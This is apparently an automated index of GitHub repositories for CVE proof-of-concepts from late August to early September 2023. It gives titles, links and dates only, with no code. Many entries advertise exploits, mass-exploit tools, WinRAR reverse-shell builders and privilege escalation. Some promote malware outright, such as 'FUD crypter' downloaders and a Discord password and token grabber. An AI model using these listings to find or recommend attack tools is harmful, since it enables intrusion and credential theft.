**Cisco AnyConnect Posture (HostScan) Local Privilege Escalation: CVE-2021-1366** : [koztkozt/CVE-2021-1366](https://github.com/koztkozt/CVE-2021-1366) create time: 2023-09-08T09:11:09Z

**no description** : [jakabakos/CVE-2023-27524-Apache-Superset-Auth-Bypass-and-RCE](https://github.com/jakabakos/CVE-2023-27524-Apache-Superset-Auth-Bypass-and-RCE) create time: 2023-09-08T06:15:00Z

**notepad++堆缓冲区溢出漏洞CVE-2023-40031 分析与复现** : [webraybtl/CVE-2023-40031](https://github.com/webraybtl/CVE-2023-40031) create time: 2023-09-08T05:43:12Z

**Automatic Mass Tool for checking vulnerability in CVE-2022-0591 - Formcraft3 < 3.8.28 - Unauthenticated SSRF** : [im-hanzou/FC3er](https://github.com/im-hanzou/FC3er) create time: 2023-09-07T18:41:43Z

**CVE-2023-40930 Repetition Enviroment** : [NSnidie/-CVE-2023-40930](https://github.com/NSnidie/-CVE-2023-40930) create time: 2023-09-07T16:50:02Z

**no description** : [SUPRAAA-1337/CVE-2021-20021](https://github.com/SUPRAAA-1337/CVE-2021-20021) create time: 2023-09-07T16:17:41Z

**This is a PoC for CVE-2023-27372 and spawns a fully interactive shell.** : [redboltsec/CVE-2023-27372-PoC](https://github.com/redboltsec/CVE-2023-27372-PoC) create time: 2023-09-07T16:17:03Z

**An exploit for OpenTSDB <= 2.4.1 cmd injection (CVE-2023-36812/CVE-2023-25826) written in Fortran** : [ErikWynter/opentsdb_key_cmd_injection](https://github.com/ErikWynter/opentsdb_key_cmd_injection) create time: 2023-09-07T13:47:13Z

**A Python-based tool to detect the CVE-2023-30943 vulnerability in Moodle, which allows unauthorized folder creation via specially crafted requests in TinyMCE loaders.** : [Chocapikk/CVE-2023-30943](https://github.com/Chocapikk/CVE-2023-30943) create time: 2023-09-07T13:25:55Z

**no description** : [Sh33talUmath/CVE-2023-41535](https://github.com/Sh33talUmath/CVE-2023-41535) create time: 2023-09-07T11:01:04Z

**no description** : [Sh33talUmath/CVE-2023-41534](https://github.com/Sh33talUmath/CVE-2023-41534) create time: 2023-09-07T10:58:32Z

**no description** : [Sh33talUmath/CVE-2023-41533](https://github.com/Sh33talUmath/CVE-2023-41533) create time: 2023-09-07T10:50:03Z

**Explanation and POC of the CVE-2023-23946** : [bruno-1337/CVE-2023-23946-POC](https://github.com/bruno-1337/CVE-2023-23946-POC) create time: 2023-09-07T10:07:25Z

**Vulnerability details and exploit for CVE-2021-3754** : [7Ragnarok7/CVE-2021-3754](https://github.com/7Ragnarok7/CVE-2021-3754) create time: 2023-09-07T07:49:21Z

**CVE-2023-41593** : [MATRIXDEVIL/CVE](https://github.com/MATRIXDEVIL/CVE) create time: 2023-09-07T06:59:09Z

**Quick exploit builder for CVE-2023-38831, a vulnerability that affects WinRAR versions before 6.23.** : [GOTonyGO/CVE-2023-38831-winrar](https://github.com/GOTonyGO/CVE-2023-38831-winrar) create time: 2023-09-07T06:42:36Z

**The PoC of CVE-2023-36123** : [9Bakabaka/CVE-2023-36123](https://github.com/9Bakabaka/CVE-2023-36123) create time: 2023-09-06T14:29:18Z

**no description** : [nidhi7598/linux-4.19.72_CVE-2023-3567](https://github.com/nidhi7598/linux-4.19.72_CVE-2023-3567) create time: 2023-09-06T11:16:22Z

**no description** : [nidhi7598/linux-4.19.72_CVE-2023-3812](https://github.com/nidhi7598/linux-4.19.72_CVE-2023-3812) create time: 2023-09-06T06:03:40Z

**Text4Shell** : [Sic4rio/CVE-2022-42889](https://github.com/Sic4rio/CVE-2022-42889) create time: 2023-09-06T01:13:26Z

**no description** : [TuanLeDevelopment/CVE-2023-12345-Vulnerability-Forced-MDM-Profiles-Removal-Exploit](https://github.com/TuanLeDevelopment/CVE-2023-12345-Vulnerability-Forced-MDM-Profiles-Removal-Exploit) create time: 2023-09-05T20:39:32Z

**WARNING: This is a vulnerable application to test the exploit for the Cacti command injection (CVE-2023-39362). Run it at your own risk!** : [m3ssap0/cacti-rce-snmp-options-vulnerable-application](https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application) create time: 2023-07-03T09:43:21Z

**A bash script for easyly exploiting ImageMagick Arbitrary File Read Vulnerability CVE-2022-44268** : [atici/Exploit-for-ImageMagick-CVE-2022-44268](https://github.com/atici/Exploit-for-ImageMagick-CVE-2022-44268) create time: 2023-09-05T17:16:06Z

**Generate Seralize Payload for CVE-2019-0604 for Sharepoint 2010 SP2 .net 3.5** : [davidlebr1/cve-2019-0604-SP2010-netv3.5](https://github.com/davidlebr1/cve-2019-0604-SP2010-netv3.5) create time: 2023-09-05T13:47:17Z

**no description** : [Ijinleife/CVE-2019-14287](https://github.com/Ijinleife/CVE-2019-14287) create time: 2023-09-05T13:46:33Z

**no description** : [asepsaepdin/CVE-2021-3156](https://github.com/asepsaepdin/CVE-2021-3156) create time: 2023-09-05T14:06:26Z

**CVE-2023-3124 PoC** : [AmirWhiteHat/CVE-2023-3124](https://github.com/AmirWhiteHat/CVE-2023-3124) create time: 2023-09-05T12:32:50Z

**Cisco r042 research** : [lnversed/CVE-2023-20025](https://github.com/lnversed/CVE-2023-20025) create time: 2023-04-30T12:46:16Z

**no description** : [thperchi/CVE-2023-41080](https://github.com/thperchi/CVE-2023-41080) create time: 2023-09-05T11:51:55Z

**A tool to fetch the RocketMQ broker configuration in order to discover indicators of compromise for CVE-2023-33246** : [vulncheck-oss/fetch-broker-conf](https://github.com/vulncheck-oss/fetch-broker-conf) create time: 2023-09-04T11:18:28Z

**CVE-2023-4634** : [Patrowl/CVE-2023-4634](https://github.com/Patrowl/CVE-2023-4634) create time: 2023-09-05T07:44:15Z

**Mass Exploit - CVE-2023-27034** : [codeb0ss/CVE-2023-27034-Exploit](https://github.com/codeb0ss/CVE-2023-27034-Exploit) create time: 2023-09-05T04:43:06Z

**Mass Exploit - CVE-2023-34747 - Ujcms - Arbitrary File Upload** : [codeb0ss/CVE-2023-34747-PoC](https://github.com/codeb0ss/CVE-2023-34747-PoC) create time: 2023-09-05T04:36:42Z

**Mass exploit - CVE-2023-41538 < phpjabbers PHP Forum < Cross Site Scripting (XSS)** : [codeb0ss/CVE-2023-41538-PoC](https://github.com/codeb0ss/CVE-2023-41538-PoC) create time: 2023-09-05T04:26:52Z

**CVE-2023-41508 - A hard-coded password in Super Store Finder v3.6 allows attackers to access the administration panel.** : [redblueteam/CVE-2023-41508](https://github.com/redblueteam/CVE-2023-41508) create time: 2023-09-05T03:29:37Z

**CVE-2023-41507 A hard coded password in Super Store Finder v3.6 allows attackers to access the administration panel.** : [redblueteam/CVE-2023-41507](https://github.com/redblueteam/CVE-2023-41507) create time: 2023-09-05T03:26:15Z

**no description** : [wudidike/CVE-2023-4741](https://github.com/wudidike/CVE-2023-4741) create time: 2023-08-22T06:00:57Z

**Script to exploit CVE-2023-38035** : [mind2hex/MICS_Hunter](https://github.com/mind2hex/MICS_Hunter) create time: 2023-09-05T01:58:39Z

**Looking into the memory when sshd 9.1p1 aborts due to a double free bug.** : [Business1sg00d/CVE-2023-25136](https://github.com/Business1sg00d/CVE-2023-25136) create time: 2023-09-04T19:28:43Z

**CVE-2020-0069** : [0xf15h/mtk_su](https://github.com/0xf15h/mtk_su) create time: 2023-09-04T17:52:04Z

**Memory analysis of OpenSSH sshd binary during and after double-free error.** : [Business1sg00d/CVE-2023-25136](https://github.com/Business1sg00d/CVE-2023-25136) create time: 2023-09-04T16:46:43Z

**no description** : [asepsaepdin/CVE-2019-13272](https://github.com/asepsaepdin/CVE-2019-13272) create time: 2023-09-04T15:16:09Z

**no description** : [revan-ar/CVE-2023-4278](https://github.com/revan-ar/CVE-2023-4278) create time: 2023-09-04T14:16:32Z

**no description** : [Y3A/CVE-2023-28229](https://github.com/Y3A/CVE-2023-28229) create time: 2023-09-04T07:48:13Z

**no description** : [nidhi7598/linux-4.19.72_CVE-2023-3567](https://github.com/nidhi7598/linux-4.19.72_CVE-2023-3567) create time: 2023-09-04T06:31:48Z

**no description** : [mnqazi/CVE-2023-4698](https://github.com/mnqazi/CVE-2023-4698) create time: 2023-09-01T09:24:08Z

**no description** : [MY0723/CNVD-2022-27366__CVE-2023-37621](https://github.com/MY0723/CNVD-2022-27366__CVE-2023-37621) create time: 2023-06-29T01:36:10Z

**Maxprint Maxlink 1200G v3.4.11E has an OS command injection vulnerability in the "Diagnostic tool" functionality of the device.** : [RobinTrigon/CVE-2023-36143](https://github.com/RobinTrigon/CVE-2023-36143) create time: 2023-09-04T05:08:28Z

**CVE-2023-34039** : [syedhafiz1234/CVE-2023-34039](https://github.com/syedhafiz1234/CVE-2023-34039) create time: 2023-09-04T03:27:56Z

**nftables oob read/write exploit (CVE-2023-35001)** : [syedhafiz1234/nftables-oob-read-write-exploit-CVE-2023-35001-](https://github.com/syedhafiz1234/nftables-oob-read-write-exploit-CVE-2023-35001-) create time: 2023-09-04T03:25:01Z

**Steps needed to obtain a reverse shell exploiting the winrar vulnerability CVE-2023-38831 in versions prior to 6.23.** : [LuxCodeDev/CVE-2023-38831_WinRAR](https://github.com/LuxCodeDev/CVE-2023-38831_WinRAR) create time: 2023-09-03T21:14:14Z

**This module exploits a vulnerability in WinRAR (CVE-2023-38831). When a user opens a crafted RAR file and its embedded document, a script is executed, leading to code execution.** : [xaitax/WinRAR-CVE-2023-38831](https://github.com/xaitax/WinRAR-CVE-2023-38831) create time: 2023-09-03T21:14:05Z

**no description** : [SUPRAAA-1337/CVE-2022-41082](https://github.com/SUPRAAA-1337/CVE-2022-41082) create time: 2023-09-03T20:55:20Z

**no description** : [rodolfomarianocy/Unauthenticated-RCE-FUXA-CVE-2023-33831](https://github.com/rodolfomarianocy/Unauthenticated-RCE-FUXA-CVE-2023-33831) create time: 2023-09-03T19:25:15Z

**CVE-2022-24086 POC example** : [BurpRoot/CVE-2022-24086](https://github.com/BurpRoot/CVE-2022-24086) create time: 2023-09-03T17:27:58Z

**no description** : [Fa1c0n35/CVE-2023-38831-winrar-exploit](https://github.com/Fa1c0n35/CVE-2023-38831-winrar-exploit) create time: 2023-09-03T14:53:42Z

**CVE-2023-38831-WINRAR-EXPLOIT GENERATOR** : [K3rnel-Dev/WinrarExploit](https://github.com/K3rnel-Dev/WinrarExploit) create time: 2023-09-03T14:03:45Z

**How to get access via CVE-2022-27997** : [Cyb3rEnthusiast/CVE-2022-27997](https://github.com/Cyb3rEnthusiast/CVE-2022-27997) create time: 2023-09-03T10:01:24Z

**Here it is, the VMware newest exploit** : [Cyb3rEnthusiast/CVE-2023-34039](https://github.com/Cyb3rEnthusiast/CVE-2023-34039) create time: 2023-09-03T10:03:36Z

**no description** : [asepsaepdin/CVE-2023-38831](https://github.com/asepsaepdin/CVE-2023-38831) create time: 2023-09-03T09:18:56Z

**no description** : [victorhorowitz/grafana-exploit-CVE-2021-43798](https://github.com/victorhorowitz/grafana-exploit-CVE-2021-43798) create time: 2023-09-03T04:11:39Z

**no description** : [0xCoolAnon/CVE-2017-0199-v5.0](https://github.com/0xCoolAnon/CVE-2017-0199-v5.0) create time: 2023-09-02T19:15:12Z

**This tool is been update and can use latest python version** : [0xCoolAnon/CVE-2017-0199.2023-Update](https://github.com/0xCoolAnon/CVE-2017-0199.2023-Update) create time: 2023-09-02T19:09:45Z

**no description** : [anky-123/CVE-2023-39725](https://github.com/anky-123/CVE-2023-39725) create time: 2023-09-02T12:29:59Z

**test-yaml** : [SUPRAAA-1337/CVE-2021-34523](https://github.com/SUPRAAA-1337/CVE-2021-34523) create time: 2023-09-02T12:26:18Z

**no description** : [sohamsharma966/Spring4Shell-CVE-2022-22965](https://github.com/sohamsharma966/Spring4Shell-CVE-2022-22965) create time: 2023-09-02T10:41:05Z

**VMware exploit** : [CharonDefalt/CVE-2023-34039](https://github.com/CharonDefalt/CVE-2023-34039) create time: 2023-09-02T07:56:06Z

**no description** : [iceberg-N/cve-2023-test](https://github.com/iceberg-N/cve-2023-test) create time: 2023-09-02T06:41:12Z

**no description** : [BrunoTeixeira1996/CVE-2021-39473](https://github.com/BrunoTeixeira1996/CVE-2021-39473) create time: 2023-09-01T23:16:05Z

**Cross Site Scripting vulnerability in mooSocial mooSocial Software v.3.1.6 allows a remote attacker to execute arbitrary code via a crafted script to the edit_menu, copuon, and group_categorias functions** : [MinoTauro2020/CVE-2023-40869](https://github.com/MinoTauro2020/CVE-2023-40869) create time: 2023-09-02T00:47:37Z

**Cross Site Request Forgery vulnerability in mooSocial MooSocial Software v.Demo allows a remote attacker to execute arbitrary code via the Delete Account and Deactivate functions.** : [MinoTauro2020/CVE-2023-40868](https://github.com/MinoTauro2020/CVE-2023-40868) create time: 2023-09-02T00:24:22Z

**no description** : [BrunoTeixeira1996/CVE-2023-36250](https://github.com/BrunoTeixeira1996/CVE-2023-36250) create time: 2023-09-01T23:06:33Z

**no description** : [0xDivyanshu-new/CVE-2019-16098](https://github.com/0xDivyanshu-new/CVE-2019-16098) create time: 2023-09-01T21:35:40Z

**no description** : [samh4cks/CVE-2016-6210-OpenSSH-User-Enumeration](https://github.com/samh4cks/CVE-2016-6210-OpenSSH-User-Enumeration) create time: 2023-09-01T20:43:25Z

**no description** : [tristao-marinho/CVE-2023-41646](https://github.com/tristao-marinho/CVE-2023-41646) create time: 2023-09-01T16:46:07Z

**CVE-2023-38831 winrar exploit builder** : [Mich-ele/CVE-2023-38831-winrar](https://github.com/Mich-ele/CVE-2023-38831-winrar) create time: 2023-09-01T16:45:42Z

**VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)** : [sinsinology/CVE-2023-34039](https://github.com/sinsinology/CVE-2023-34039) create time: 2023-09-01T16:17:10Z

**CVE-2023-38831 winrar exploit builder** : [Mich-ele/CVE-2023-38831-winrar](https://github.com/Mich-ele/CVE-2023-38831-winrar) create time: 2023-09-01T15:58:38Z

**no description** : [iceberg-N/cve-2023-test1](https://github.com/iceberg-N/cve-2023-test1) create time: 2023-09-01T14:57:43Z

**no description** : [iceberg-N/cve-2023-test](https://github.com/iceberg-N/cve-2023-test) create time: 2023-09-01T14:20:34Z

**Example payload for CVE-2022-21894** : [ASkyeye/CVE-2022-21894-Payload](https://github.com/ASkyeye/CVE-2022-21894-Payload) create time: 2022-08-18T23:45:47Z

**no description** : [nidhi7598/linux-4.19.72_CVE-2023-3609](https://github.com/nidhi7598/linux-4.19.72_CVE-2023-3609) create time: 2023-09-01T10:44:56Z

**CVE-2023-26469 REC PoC** : [d0rb/CVE-2023-26469](https://github.com/d0rb/CVE-2023-26469) create time: 2023-09-01T09:41:32Z

**https://medium.com/@mnqazi/cve-2023-4696-account-takeover-due-to-improper-handling-of-jwt-tokens-in-memos-v0-13-2-13104e1412f3** : [mnqazi/CVE-2023-4696](https://github.com/mnqazi/CVE-2023-4696) create time: 2023-09-01T09:02:03Z

**Pwn2Own Vancouver 2023 Ubuntu LPE exploit** : [synacktiv/CVE-2023-35001](https://github.com/synacktiv/CVE-2023-35001) create time: 2023-09-01T07:41:23Z

**no description** : [nidhi7598/linux-4.1.15_CVE-2023-3567](https://github.com/nidhi7598/linux-4.1.15_CVE-2023-3567) create time: 2023-09-01T05:53:45Z

**no description** : [mvpyyds/CVE-2023-4166](https://github.com/mvpyyds/CVE-2023-4166) create time: 2023-09-01T05:33:38Z

**no description** : [mvpyyds/CVE-2023-4165](https://github.com/mvpyyds/CVE-2023-4165) create time: 2023-09-01T03:55:23Z

**Fhem任意文件读取poc** : [zzzz966/CVE-2020-19360](https://github.com/zzzz966/CVE-2020-19360) create time: 2023-09-01T01:33:22Z

**CVE-2023-26255_POC,CVE-2023-26256_POC** : [jcad123/CVE-2023-26256](https://github.com/jcad123/CVE-2023-26256) create time: 2023-09-01T00:10:36Z

**PoC of CVE-2023-36281** : [tagomaru/CVE-2023-36281](https://github.com/tagomaru/CVE-2023-36281) create time: 2023-08-31T21:31:43Z

**no description** : [yuanjinyuyuyu/CVE-2023-3450](https://github.com/yuanjinyuyuyu/CVE-2023-3450) create time: 2023-08-31T17:32:27Z

**A Nuclei template to detect ZeroQlik (CVE-2023-41265 and CVE-2023-41266)** : [praetorian-inc/zeroqlik-detect](https://github.com/praetorian-inc/zeroqlik-detect) create time: 2023-08-30T16:15:19Z

**an exploit of POC for CVE-2023-34362 affecting MOVEit Transfer** : [errorfiathck/MOVEit-Exploit](https://github.com/errorfiathck/MOVEit-Exploit) create time: 2023-08-31T13:25:53Z

**CVE-2020-19360** : [a1665454764/CVE-2020-19360](https://github.com/a1665454764/CVE-2020-19360) create time: 2023-08-31T12:47:52Z

**This repository is to provide a write-up and PoC for CVE-2023-41717.** : [federella/CVE-2023-41717](https://github.com/federella/CVE-2023-41717) create time: 2023-08-31T08:10:22Z

**Script for checking CVE-2023-3519 for Backdoors** : [JonaNeidhart/CVE-2023-3519-BackdoorCheck](https://github.com/JonaNeidhart/CVE-2023-3519-BackdoorCheck) create time: 2023-08-31T09:10:30Z

**Tool for CVE-2023-32315 exploitation** : [gibran-abdillah/CVE-2023-32315](https://github.com/gibran-abdillah/CVE-2023-32315) create time: 2023-08-31T08:43:44Z

**no description** : [niceeeeeeee/CVE-2021-22145-poc](https://github.com/niceeeeeeee/CVE-2021-22145-poc) create time: 2023-08-31T07:56:03Z

**CVE-2023-30943 RCE PoC** : [d0rb/CVE-2023-30943](https://github.com/d0rb/CVE-2023-30943) create time: 2023-08-31T08:18:17Z

**no description** : [Trinadh465/platform_art_CVE-2021-0394](https://github.com/Trinadh465/platform_art_CVE-2021-0394) create time: 2023-08-31T07:00:49Z

**[CVE_2023_28432漏洞 、CVE_2023_32315漏洞、 ThinkPHP 2.x 任意代码执行漏洞 、ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞、 ThinkPHP5 5.0.23 远程代码执行漏洞 ThinkPHP 多语言本地文件包含漏洞]** : [bingtangbanli/VulnerabilityTools](https://github.com/bingtangbanli/VulnerabilityTools) create time: 2023-08-31T03:22:09Z

**Jira plugin STAGIL Navigation FileName的参数任意文件读取漏洞** : [Nian-Stars/CVE-2023-26255-6](https://github.com/Nian-Stars/CVE-2023-26255-6) create time: 2023-08-30T23:57:10Z

**PoC Script for CVE-2023-4596, unauthenticated Remote Command Execution through arbitrary file uploads.** : [E1A/CVE-2023-4596](https://github.com/E1A/CVE-2023-4596) create time: 2023-08-30T22:40:10Z

**CVE-2023-27524** : [necroteddy/CVE-2023-27524](https://github.com/necroteddy/CVE-2023-27524) create time: 2023-08-30T20:59:28Z

**This is a basic proof of concept for the CVE-2023-3883 exploit targeting WinRAR up to 6.22. Modified some existing internet-sourced POCs by introducing greater dynamism and incorporated additional try-except blocks within the code.** : [MorDavid/CVE-2023-38831-Winrar-Exploit-Generator-POC](https://github.com/MorDavid/CVE-2023-38831-Winrar-Exploit-Generator-POC) create time: 2023-08-30T19:55:11Z

**no description** : [BeniBeastt/CVE-2023-38831_ReverseShell_Winrar](https://github.com/BeniBeastt/CVE-2023-38831_ReverseShell_Winrar) create time: 2023-08-30T15:49:01Z

**Retrieve the master password of a keepass database <= 2.53.1** : [4m4Sec/CVE-2023-32784](https://github.com/4m4Sec/CVE-2023-32784) create time: 2023-08-30T16:42:19Z

**Vulnerability Disclosure Timeline Closer inspection of the Exploit JPG content reveals the malicious link as well as the URL Download and Execute of the tool used to generate the Exploit JPG from Python encrypted code content which we also implement in couple of our builders.Silent JPG Exploit There are multiple Exploit JPG in Silent JPG Exploit, a** : [RcsJJ9/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022](https://github.com/RcsJJ9/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022) create time: 2023-08-30T15:55:26Z

**no description** : [qs119/CVE-2023-26256](https://github.com/qs119/CVE-2023-26256) create time: 2023-08-30T15:21:00Z

**Vulnerability Disclosure Timeline Closer inspection of the Exploit JPG content reveals the malicious link as well as the URL Download and Execute of the tool used to generate the Exploit JPG from Python encrypted code content which we also implement in couple of our builders.Silent JPG Exploit There are multiple Exploit JPG in Silent JPG Exploit, a** : [OrgazLm/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022](https://github.com/OrgazLm/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022) create time: 2023-08-30T14:58:46Z

**Get system info (Version, CPU, GPU, RAM, IPs, BSSID, Location, Screen metrics, Installed apps) Chromium based browsers (passwords, credit cards, cookies, history, autofill, bookmarks) Firefox based browsers (db files, cookies, history, bookmarks) Internet explorer/Edge (passwords) Saved wifi networks & scan networks around device (SSID, BSSID) s** : [NothingNgga/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022](https://github.com/NothingNgga/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022) create time: 2023-08-30T14:40:41Z

**no description** : [qs119/CVE-2023-26256](https://github.com/qs119/CVE-2023-26256) create time: 2023-08-30T15:08:12Z

**CVE-2022-46169** : [a1665454764/CVE-2022-46169](https://github.com/a1665454764/CVE-2022-46169) create time: 2023-08-30T14:03:41Z

**Proof-of-Concept for CVE-2023-38831 Zero-Day vulnerability in WinRAR** : [z3r0sw0rd/CVE-2023-38831-PoC](https://github.com/z3r0sw0rd/CVE-2023-38831-PoC) create time: 2023-08-30T11:52:23Z

**CVE-2023-26818 Exploit MacOS TCC Bypass W/ Telegram** : [Zeyad-Azima/CVE-2023-26818](https://github.com/Zeyad-Azima/CVE-2023-26818) create time: 2023-08-30T12:40:50Z

**大华智慧园区综合管理平台publishing文件上传** : [zh-byte/CVE-2023-3836](https://github.com/zh-byte/CVE-2023-3836) create time: 2023-08-30T12:11:42Z

**POC for Spring Kafka Deserialization Vulnerability CVE-2023-34040** : [Contrast-Security-OSS/Spring-Kafka-POC-CVE-2023-34040](https://github.com/Contrast-Security-OSS/Spring-Kafka-POC-CVE-2023-34040) create time: 2023-08-30T12:09:15Z

**no description** : [SugiB3o/Keylog_CVE2023-38831](https://github.com/SugiB3o/Keylog_CVE2023-38831) create time: 2023-08-30T10:48:04Z

**no description** : [Ahmed1Al/CVE-2023-38831-winrar-exploit](https://github.com/Ahmed1Al/CVE-2023-38831-winrar-exploit) create time: 2023-08-30T10:34:03Z

**CVE-2021-3019** : [a1665454764/CVE-2021-3019](https://github.com/a1665454764/CVE-2021-3019) create time: 2023-08-30T09:41:09Z

**winrar exploit 6.22 <=** : [nhman-python/CVE-2023-38831](https://github.com/nhman-python/CVE-2023-38831) create time: 2023-08-30T10:11:16Z

**Ivanti Endpoint Manager Mobile (EPMM) POC** : [Blue-number/CVE-2023-35078](https://github.com/Blue-number/CVE-2023-35078) create time: 2023-08-30T02:36:20Z

**Mass Exploit - CVE-2023-39141 < Aria2 WebUI < Path traversal** : [codeb0ss/CVE-2023-39141-PoC](https://github.com/codeb0ss/CVE-2023-39141-PoC) create time: 2023-08-30T02:35:14Z

**Adapted CVE-2020-0041 root exploit for Pixel 3** : [jcalabres/root-exploit-pixel3](https://github.com/jcalabres/root-exploit-pixel3) create time: 2023-08-29T20:48:56Z

**CVE-2023-40477 PoC by Wild-Pointer** : [wildptr-io/Winrar-CVE-2023-40477-POC](https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC) create time: 2023-08-29T16:29:48Z

**This repository has both an attack detection tool and a Proof-of-Concept (PoC) Python script for the WinRAR CVE-2023-38831 vulnerability.** : [Mourtadah/CVE-2023-38831-Exploit-and-Detection](https://github.com/Mourtadah/CVE-2023-38831-Exploit-and-Detection) create time: 2023-08-29T16:12:20Z

**Scan for WinRAR files affected to CVE-2023-40477** : [winkler-winsen/Scan_WinRAR](https://github.com/winkler-winsen/Scan_WinRAR) create time: 2023-08-29T14:41:58Z

**PoC for 2023-27163 Maltrail v0.53** : [josephberger/CVE-2023-27163](https://github.com/josephberger/CVE-2023-27163) create time: 2023-08-29T14:02:42Z

**Scan for GhostScript files affected to CVE-2023-36664** : [winkler-winsen/Scan_GhostScript](https://github.com/winkler-winsen/Scan_GhostScript) create time: 2023-08-29T14:01:49Z

**CVE-2023** : [ayhan-dev/CVE](https://github.com/ayhan-dev/CVE) create time: 2023-08-28T15:53:25Z

**no description** : [nidhi7598/frameworks_base_AOSP_10_r33_CVE-2021-0443](https://github.com/nidhi7598/frameworks_base_AOSP_10_r33_CVE-2021-0443) create time: 2023-08-29T12:29:57Z

**no description** : [Trinadh465/linux-4.19.72_CVE-2020-15436](https://github.com/Trinadh465/linux-4.19.72_CVE-2020-15436) create time: 2023-08-29T10:53:27Z

**no description** : [Trinadh465/linux-4.1.15_CVE-2020-15436](https://github.com/Trinadh465/linux-4.1.15_CVE-2020-15436) create time: 2023-08-29T09:20:15Z

**no description** : [hanmin0512/CVE-2014-6271_pwnable](https://github.com/hanmin0512/CVE-2014-6271_pwnable) create time: 2023-08-29T06:58:26Z

**Proof of Concept (POC) for CVE-2023-38831 WinRAR** : [thegr1ffyn/CVE-2023-38831](https://github.com/thegr1ffyn/CVE-2023-38831) create time: 2023-08-29T06:11:42Z

**no description** : [adhikara13/CVE-2023-38829-NETIS-WF2409E](https://github.com/adhikara13/CVE-2023-38829-NETIS-WF2409E) create time: 2023-07-11T21:57:36Z

**CVE-2023-38831 winrar exploit generator and get reverse shell** : [my-elliot/CVE-2023-38831-winrar-expoit-simple-Poc](https://github.com/my-elliot/CVE-2023-38831-winrar-expoit-simple-Poc) create time: 2023-08-28T22:08:31Z

**A tool to perform port scanning using vulnerable Request-Baskets** : [samh4cks/CVE-2023-27163-InternalProber](https://github.com/samh4cks/CVE-2023-27163-InternalProber) create time: 2023-08-28T16:19:21Z

**no description** : [PascalAsch/CVE-2023-38831-KQL](https://github.com/PascalAsch/CVE-2023-38831-KQL) create time: 2023-08-28T15:26:14Z

**CVE-2023-38831 WinRAR** : [akhomlyuk/cve-2023-38831](https://github.com/akhomlyuk/cve-2023-38831) create time: 2023-08-28T14:48:35Z

**Understanding WinRAR Code Execution Vulnerability (CVE-2023-38831)** : [knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831](https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831) create time: 2023-08-28T14:48:22Z

**no description** : [Trinadh465/linux-4.1.15_CVE-2020-15436](https://github.com/Trinadh465/linux-4.1.15_CVE-2020-15436) create time: 2023-08-28T12:28:56Z

**Pasos necesarios para obtener una reverse shell explotando la vulnerabilidad de winrar CVE-2023-38831 en versiones anteriores a 6.23.** : [Maalfer/CVE-2023-38831_ReverseShell_Winrar-RCE](https://github.com/Maalfer/CVE-2023-38831_ReverseShell_Winrar-RCE) create time: 2023-08-28T08:56:16Z

**no description** : [PascalAsch/CVE-2023-38831-KQL](https://github.com/PascalAsch/CVE-2023-38831-KQL) create time: 2023-08-28T08:18:27Z

**CVE-2023-26256_POC** : [csdcsdcsdcsdcsd/CVE-2023-26256](https://github.com/csdcsdcsdcsdcsd/CVE-2023-26256) create time: 2023-08-28T08:00:16Z

**CVE-2023-38831 PoC (Proof Of Concept)** : [HDCE-inc/CVE-2023-38831](https://github.com/HDCE-inc/CVE-2023-38831) create time: 2023-08-28T04:56:10Z

**An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831, WinRAR RCE before versions 6.23** : [ignis-sec/CVE-2023-38831-RaRCE](https://github.com/ignis-sec/CVE-2023-38831-RaRCE) create time: 2023-08-27T21:49:37Z

**PHPUnit RCE** : [Chocapikk/CVE-2017-9841](https://github.com/Chocapikk/CVE-2017-9841) create time: 2023-08-27T21:20:19Z

**CVE-2017-7921 exploit. Allows admin password retrieval and automatic snapshot download.** : [fracergu/CVE-2017-7921](https://github.com/fracergu/CVE-2017-7921) create time: 2023-08-27T17:29:48Z

**一款用于生成winrar程序RCE(即cve-2023-38831)的POC的工具。** : [Garck3h/cve-2023-38831](https://github.com/Garck3h/cve-2023-38831) create time: 2023-08-27T14:08:36Z

**POC for CVE-2023-24489 with bash.** : [whalebone7/CVE-2023-24489-poc](https://github.com/whalebone7/CVE-2023-24489-poc) create time: 2023-08-27T11:53:59Z

**no description** : [IR-HuntGuardians/CVE-2023-38831-HUNT](https://github.com/IR-HuntGuardians/CVE-2023-38831-HUNT) create time: 2023-08-27T08:42:24Z

**CVE-2023-38389 < Wordpress < JupiterX Core < Unauthenticated Account Takeover** : [codeb0ss/CVE-2023-38389-PoC](https://github.com/codeb0ss/CVE-2023-38389-PoC) create time: 2023-08-27T00:30:16Z

**Python implementation of CVE-2018-16858** : [Henryisnotavailable/CVE-2018-16858-Python](https://github.com/Henryisnotavailable/CVE-2018-16858-Python) create time: 2023-08-26T14:50:55Z

**no description** : [shiomiyan/CVE-2023-41080](https://github.com/shiomiyan/CVE-2023-41080) create time: 2023-08-26T15:11:31Z

**no description** : [bingtangbanli/cve-2023-2523-and-cve-2023-2648](https://github.com/bingtangbanli/cve-2023-2523-and-cve-2023-2648) create time: 2023-08-26T11:23:58Z

**JDK CVE-2023-21939** : [Y4Sec-Team/CVE-2023-21939](https://github.com/Y4Sec-Team/CVE-2023-21939) create time: 2023-08-26T06:45:26Z

**Mass Exploit - CVE-2023-38388 < Unauthenticated < Arbitrary File Upload** : [codeb0ss/CVE-2023-38388](https://github.com/codeb0ss/CVE-2023-38388) create time: 2023-08-26T05:51:06Z

**no description** : [tucommenceapousser/CVE-2023-26255-Exp](https://github.com/tucommenceapousser/CVE-2023-26255-Exp) create time: 2023-08-25T21:56:48Z

**A PoC exploit for CVE-2021-42013 - Apache 2.4.49 & 2.4.50 Remote Code Execution** : [K3ysTr0K3R/CVE-2021-42013-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2021-42013-EXPLOIT) create time: 2023-08-25T19:51:01Z

